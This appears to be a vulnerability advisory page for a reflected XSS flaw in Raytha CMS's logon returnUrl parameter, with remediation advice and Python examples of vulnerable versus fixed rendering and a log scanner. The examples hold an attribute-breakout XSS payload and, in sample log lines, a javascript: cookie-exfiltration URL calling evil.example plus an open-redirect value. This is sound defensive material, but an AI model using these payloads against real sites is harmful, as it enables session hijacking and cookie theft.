CVE-2025-69245

EUVD-2025-208715 | MEDIUM
2026-03-16 | CERT-PL
CVSS 4.0 base score: 5.1

CVSS Vector

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N
Attack Vector: Network
Attack Complexity: Low
Attack Requirements: None
Privileges Required: None
User Interaction: Active (the victim must open the crafted link)
Vulnerable System Impact (C/I/A): None / None / None
Subsequent System Impact (C/I/A): Low / Low / None

The impact lands on the subsequent system (the victim's browser session) rather than on the CMS host itself, which is why VC/VI/VA are None while SC/SI are Low. No credentials are needed to reach the logon endpoint (PR:N); the only barrier is convincing a user to open the link (UI:A).

Lifecycle Timeline

Mar 16, 2026 - 11:54 - CVE published (nvd), rated MEDIUM 5.1
Mar 16, 2026 - 12:00 - EUVD ID assigned (euvd): EUVD-2025-208715
Mar 16, 2026 - 12:00 - Analysis generated (vuln.today)

Description

Raytha CMS is vulnerable to Reflected XSS via returnUrl parameter in logon functionality. An attacker can craft a malicious URL which, when opened by the authenticated victim, results in arbitrary JavaScript execution in the victim’s browser. This issue was fixed in 1.4.6.

Analysis

Raytha CMS contains a Reflected Cross-Site Scripting (XSS) vulnerability in the returnUrl parameter of its logon functionality. The parameter value is reflected into the logon response without adequate encoding, so an attacker can embed script in a link to the logon page. When an authenticated victim opens that link, the injected script runs in the victim's browser in the origin of the CMS and with the victim's session, which can enable session hijacking, credential theft, or unauthorized actions within the CMS. The issue was fixed in version 1.4.6. The record carries a CVSS 4.0 base score of 5.1 (Medium); no KEV listing, meaningful EPSS probability, or public proof of concept is recorded at the time of writing. Even so, XSS on an authentication page is worth patching promptly: the logon endpoint is reachable without credentials, and the only thing an attacker needs is for a user to click a link.

Technical Context

This vulnerability is a Reflected XSS flaw classified under CWE-79 (Improper Neutralization of Input During Web Page Generation), one of the most common web application weakness classes. The returnUrl parameter of Raytha CMS's logon endpoint is not sufficiently validated or encoded before being reflected into the HTTP response. The logon page is a security-critical component because it is where the user's authentication state is established, and a returnUrl-style parameter is typically reflected in two places: into the page markup (for example as a hidden form field or link so the value survives the POST) and, after a successful login, into a redirect. The advisory does not describe the exact sink, but the flaw most likely arises because the value is written into HTML without encoding the characters that carry meaning in HTML and JavaScript contexts (angle brackets, quotes, and hence event-handler attributes), so the browser parses attacker-supplied text as markup and executes it. Note that the two reflection points need different controls: output encoding neutralizes markup in the HTML context, while the redirect target additionally has to be restricted to local paths, since encoding alone does nothing against a javascript: or off-site URL placed in an href or Location header.
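To make the two reflection contexts concrete, here is an added example that is not Raytha's code (Raytha itself is an ASP.NET Core application; this is a language-neutral model in Python). The render functions, the `/logon` form and the payload are constructed for illustration, and `is_local_url` is a re-implementation of the shape of ASP.NET Core's `Url.IsLocalUrl`, not a call into the framework. The payload is chosen to pass the local-URL check so the example shows that validation alone is not enough for the HTML context and encoding alone is not enough for the redirect context:

```python
"""
Added example (not Raytha's code): a minimal model of a logon page that echoes
returnUrl, first unencoded (the CWE-79 pattern), then with a local-URL check
plus HTML attribute encoding.  All names here are illustrative assumptions.
"""
import html


def is_local_url(url: str) -> bool:
    """Accept only same-site relative paths.  Assumption: this mirrors the
    shape of ASP.NET Core's Url.IsLocalUrl rather than calling it.  Rejects
    absolute URLs and anything with a scheme (javascript:, data:, https:),
    plus the '//host' and '/\\host' forms that browsers treat as an authority.
    """
    if not url:
        return False
    if url.startswith("/"):
        return len(url) == 1 or url[1] not in ("/", "\\")
    if url.startswith("~/"):
        return True
    return False


def render_logon_vulnerable(return_url: str) -> str:
    """Vulnerable pattern: the attacker-controlled value is spliced into an
    HTML attribute without encoding, so a double quote closes the attribute
    and the rest of the value is parsed as markup."""
    return (
        '<form method="post" action="/logon">'
        f'<input type="hidden" name="returnUrl" value="{return_url}">'
        '<input type="submit" value="Log in"></form>'
    )


def render_logon_fixed(return_url: str) -> str:
    """Hardened pattern: restrict the destination to a local path (this is
    what protects the post-login redirect), then HTML-encode on output (this
    is what protects the attribute context)."""
    safe_target = return_url if is_local_url(return_url) else "/"
    encoded = html.escape(safe_target, quote=True)
    return (
        '<form method="post" action="/logon">'
        f'<input type="hidden" name="returnUrl" value="{encoded}">'
        '<input type="submit" value="Log in"></form>'
    )


def reflects_unencoded(body: str, marker: str) -> bool:
    """Post-patch verification check: does the raw marker survive in the
    response body?  True means the sink is still unencoded."""
    return marker in body


# Constructed test payload: starts with "/" so a naive local-URL check lets it
# through, then breaks out of the value="..." attribute.
PAYLOAD = '/"><img src=x onerror=alert(document.domain)>'
MARKER = "<img src=x onerror"

if __name__ == "__main__":
    print("vulnerable reflects raw payload:", reflects_unencoded(render_logon_vulnerable(PAYLOAD), MARKER))
    print("fixed reflects raw payload:     ", reflects_unencoded(render_logon_fixed(PAYLOAD), MARKER))
    print("fixed redirect for javascript: URL:", render_logon_fixed("javascript:alert(1)"))
```

In the fixed variant the payload comes back as `/&quot;&gt;&lt;img ...&gt;`, which the browser renders as the literal string inside the attribute, and a `javascript:` returnUrl is replaced by `/` before it can reach a redirect.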

Affected Products

Raytha CMS versions prior to 1.4.6 are affected. Organizations running Raytha CMS should check their installed version and confirm whether it is below the patched release. The vulnerability is specific to returnUrl handling in the logon functionality of the authentication module. Exact CPE identifiers and a vendor advisory URL were not provided in the available intelligence, so administrators should consult Raytha's official security announcements and release notes to confirm version applicability and obtain the patched release.

Remediation

Upgrade Raytha CMS to version 1.4.6 or later. The advisory states only that the issue was fixed in that release and does not describe the change, so treat the upgrade as the authoritative fix. Organizations that cannot patch immediately can reduce exposure with temporary mitigations, each with a caveat: a strict Content Security Policy (a nonce- or hash-based script-src blocks injected script tags and inline event handlers, but only if the site's own inline scripts are compatible, and it is defense in depth, not a fix); a Web Application Firewall rule that decodes the returnUrl value and flags 'javascript:' URLs, event-handler attributes, or script tags (easily bypassed by encoding variations, so treat it as a stopgap); restricting the logon endpoint to trusted IP ranges where the admin login is not meant to be public; and reminding users not to open unexpected links to the CMS logon page. While mitigations are in place, monitor web-server and CMS logs for logon requests whose returnUrl contains markup or a non-local target. Once patched, verify the fix with authorization: submit a benign marker payload in returnUrl and confirm it is reflected encoded or rejected, and also confirm that returnUrl only accepts local paths, because the same parameter commonly doubles as an open redirect. Note that an HttpOnly session cookie limits cookie theft but does not stop injected script from acting in the victim's session, so cookie flags are not a substitute for the upgrade.
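The log-monitoring step above, as an added example that is not part of the advisory or of Raytha: a scanner that picks out logon requests whose returnUrl carries XSS or open-redirect indicators. The common-log-style layout, the `/login` route and the sample lines are constructed assumptions for illustration; Raytha's real route and log format may differ, so adjust `logon_path` and the request regex to your deployment. The decoder peels repeated percent-encoding because double-encoded payloads are a standard way to slip past a naive WAF pattern.

```python
"""
Added example (not Raytha's code): scan access-log lines for logon requests
whose returnUrl value looks like an XSS or open-redirect attempt.
Log layout, route and sample lines are constructed assumptions.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample lines (assumption: common-log-like format, /login route).
SAMPLE_LOG = """\
203.0.113.5 - - [16/Mar/2026:12:01:03 +0000] "GET /login?returnUrl=%2Fdashboard HTTP/1.1" 200 4321
203.0.113.7 - - [16/Mar/2026:12:01:09 +0000] "GET /login?returnUrl=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E HTTP/1.1" 200 4402
203.0.113.7 - - [16/Mar/2026:12:01:15 +0000] "GET /login?returnUrl=javascript:fetch(%27//evil.example/%27%2Bdocument.cookie) HTTP/1.1" 200 4398
203.0.113.9 - - [16/Mar/2026:12:02:00 +0000] "GET /login?returnUrl=//evil.example/phish HTTP/1.1" 302 0
203.0.113.9 - - [16/Mar/2026:12:02:30 +0000] "GET /content?returnUrl=%3Cscript%3E HTTP/1.1" 404 0
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
EVENT_HANDLER_RE = re.compile(r"\bon[a-z]+\s*=", re.I)
SCRIPT_SCHEME_RE = re.compile(r"^\s*(javascript|data|vbscript)\s*:", re.I)
ABSOLUTE_URL_RE = re.compile(r"^[a-z][a-z0-9+.\-]*://", re.I)


def decode_fully(value: str, rounds: int = 3) -> str:
    """Peel repeated percent-encoding until the value stops changing."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify_return_url(value: str) -> list:
    """Return the indicator names found in one returnUrl value (already
    URL-decoded once by parse_qs; decode_fully handles deeper layers)."""
    v = decode_fully(value)
    indicators = []
    if any(ch in v for ch in "<>\"'"):
        indicators.append("markup-chars")        # can break out of an attribute or tag
    if EVENT_HANDLER_RE.search(v):
        indicators.append("event-handler")       # onerror=, onload=, ...
    if SCRIPT_SCHEME_RE.match(v):
        indicators.append("script-scheme")       # javascript: in a redirect/href sink
    if v.startswith(("//", "/\\")) or ABSOLUTE_URL_RE.match(v):
        indicators.append("non-local-target")    # open-redirect attempt
    return indicators


def scan_log(text: str, logon_path: str = "/login") -> list:
    """Return (client_ip, raw_value, indicators) for each suspicious logon request."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if parts.path != logon_path:
            continue
        for value in parse_qs(parts.query, keep_blank_values=True).get("returnUrl", []):
            hits = classify_return_url(value)
            if hits:
                findings.append((line.split()[0], value, hits))
    return findings


if __name__ == "__main__":
    for ip, value, hits in scan_log(SAMPLE_LOG):
        print(f"{ip}  {', '.join(hits):32}  returnUrl={value!r}")
```

Run against the constructed sample this reports three of the five lines: the `"><img ... onerror=` breakout, the `javascript:` exfiltration attempt, and the protocol-relative `//evil.example` redirect; the benign `/dashboard` request and the `/content` request (wrong endpoint) are ignored. Feeding the same classifier into a WAF rule gives you the decode-before-match behaviour the mitigation above calls for.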

Priority Score

26 (scale: Low / Medium / High / Critical)
KEV: 0
EPSS: +0.1
CVSS: +26
POC: 0

CVE-2025-69245 vulnerability details – vuln.today